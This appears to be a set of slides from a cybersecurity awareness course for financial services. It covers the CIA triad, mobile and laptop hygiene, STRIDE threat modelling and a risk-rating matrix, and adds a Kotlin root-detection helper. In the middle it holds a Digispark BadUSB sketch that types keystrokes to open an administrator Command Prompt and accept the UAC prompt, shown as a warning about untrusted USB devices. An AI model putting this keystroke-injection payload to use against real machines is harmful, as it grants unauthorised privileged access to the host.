Module 4
Step 1:
Step 2:
Real life risks
Is drinking the water risky?
● Confidentiality of information
○ Only you can access your bank account statements
● Integrity of information
○ Bank account statement not changed without your approval
● Availability of services
○ Able to access the banking services without disruption
https://www.tnp.sg/news/singapore/think-your-phone-safe-public-wi-fi-think-again
Phone Devices
• Choose mobile apps from a trusted source
• Do not jailbreak or root devices
• Disable WiFi/Bluetooth when not in use
Vertical Institute
• Hacking mobile devices by plugging phones into USB
Ransomware on mobile devices
• Never click on unverified links
• Do not open untrusted email attachments
• Only download from sites you trust
• Avoid giving out personal data
• Never use unfamiliar USBs
• Back up your data
Android:
Head to the Apps & notifications menu in settings and find the Permissions option. If this isn't displayed on the main menu, it might be tucked away in the hamburger icon in the top right. From here, you can browse through all the available permissions on your phone, as well as a quick overview of how many apps have been granted each permission.
https://www.digitaltrends.com/mobile/how-to-control-ios-app-permissions/
● Financial services companies should make it compulsory for their employees to use work profiles, so that a compromised personal device cannot reach work data
○ For example, if an employee installs a rogue application, that application should not have the permissions needed to access data in the work profile
● Financial services companies should ensure that the mobile banking app their customers download refuses to run on a rooted device
○ Rooted devices give an attacker deeper access to the phone (and to the banking app's data) than is otherwise possible
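As an added example (not part of the course slides) of the root check recommended above, here is a minimal Kotlin helper that an Android banking app could call at start-up. The su binary paths and the "test-keys" build-tag check are common heuristics I have assumed here, not an official list, and all of them run on the device itself, so an attacker who already has root can hide them. Treat this as a speed bump and pair it with a server-verified attestation such as Google's Play Integrity API.

```kotlin
import android.os.Build
import java.io.File

// Added example: client-side root heuristics for the "refuse to run on a rooted
// device" recommendation. Not the course's code. The path list and the
// test-keys check are assumed, commonly used heuristics, not a guarantee.
object RootCheck {
    // Locations where the su binary is typically installed on rooted devices
    // (assumed list, not exhaustive).
    private val SU_PATHS = listOf(
        "/system/bin/su", "/system/xbin/su", "/sbin/su", "/system/su",
        "/su/bin/su", "/data/local/xbin/su", "/data/local/bin/su"
    )

    // Builds signed with the public AOSP test keys (many custom ROMs) report
    // "test-keys" in Build.TAGS; production builds report "release-keys".
    fun hasTestKeys(): Boolean = Build.TAGS?.contains("test-keys") == true

    // Does an su binary exist at any of the well-known paths?
    fun hasSuBinary(): Boolean = SU_PATHS.any { File(it).exists() }

    // Ask the shell to resolve "su" on PATH; if the process cannot be spawned
    // (SELinux, missing binary) treat that as "not found" rather than crash.
    fun canFindSuOnPath(): Boolean = try {
        val proc = Runtime.getRuntime().exec(arrayOf("/system/bin/which", "su"))
        proc.inputStream.bufferedReader().readLine() != null
    } catch (e: Exception) {
        false
    }

    // Any single indicator is enough to refuse to run; false negatives are
    // expected against root-hiding tools, which is why server-side attestation
    // should back this up.
    fun isLikelyRooted(): Boolean = hasTestKeys() || hasSuBinary() || canFindSuOnPath()
}
```

Call RootCheck.isLikelyRooted() from the launch activity and stop the app (for example, show a message and call finish()) when it returns true. How strictly to react is a risk-appetite decision for the bank, since some legitimate power users root their phones; the point the slide makes is that the app, not the user, must enforce the restriction.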
● A laptop's hard drive can be taken out of the laptop and plugged into a separate computer to read its contents, unless the disk is encrypted
● Find your laptop software
// Digispark (ATtiny85) sketch using the DigiKeyboard library. The board enumerates as a
// USB keyboard and types the sequence below, which opens an elevated Command Prompt on
// Windows and accepts the UAC prompt. Shown as a demonstration of why untrusted USB
// devices must never be plugged in.
#include "DigiKeyboard.h"

void setup()
{
  // leave it empty
}

void loop()
{
  DigiKeyboard.delay(5000); // time is measured in milliseconds; wait for the host to enumerate the keyboard
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); // open the Windows Start menu
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("cmd"); // search for Command Prompt
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT); // Ctrl+Shift+Enter runs it as administrator (triggers UAC)
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // move the UAC selection from "No" to "Yes"
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for(;;) { } // stop executing the loop so the payload runs only once
}
https://www.nbcnews.com/tech/security/juice-jacking-why-you-should-avoid-public-phone-charging-stations-n1132046
Smart home
Smart lock
• Home devices generally have a lower security posture than corporate-issued devices
• Corporate-issued devices used at home are exposed to connection attempts from compromised home devices on the same network
Identifying threats
• Identify Assets
• Create an Architecture Overview
• Decompose the Application
• Identify the Threats
• Document the Threats
• Rate the Threats
STRIDE Model
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
● Weaknesses in your overall environment that can be taken advantage of by a bad actor
● For example:
○ Weak passwords used by a newly launched website
○ Misconfiguration of a system that did not go through the review process
○ Scanner incorrectly identifying email from paper document
Risk rating = Probability x Impact

Probability \ Impact     Catastrophic: 5   Major: 4   Moderate: 3   Minor: 2   Negligible: 1
Frequent: 5                    25             20          15           10           5
Occasional: 4                  20             16          12            8           4
Remote: 3                      15             12           9            6           3
Improbable: 2                  10              8           6            4           2
Highly improbable: 1            5              4           3            2           1
Ongoing assessments
Hiring
People
• Are my users aware of the latest threats?
• Are my customers aware of phishing attacks?
Technology
• Am I equipped with the right technology to differentiate a user from a hacker?
Process
• Are processes in place to safeguard data?
• Is there room for improvement in my process?
https://www.mas.gov.sg/-/media/MAS/Regulations-and-Financial-Stability/Regulatory-and-Supervisory-Framework/Risk-Management/Internal-Control.pdf
● Control Environment
● Business Process Controls
● Checklist of Sound Practices to Adopt (page 22 to 28)
https://www.semanticscholar.org/paper/Credit-Card-Fraud-Detection-Using-Hidden-Markov-Srivastava-Kundu/841b8acad944c4cd0078fb9bac7ec3be85b607/figure/3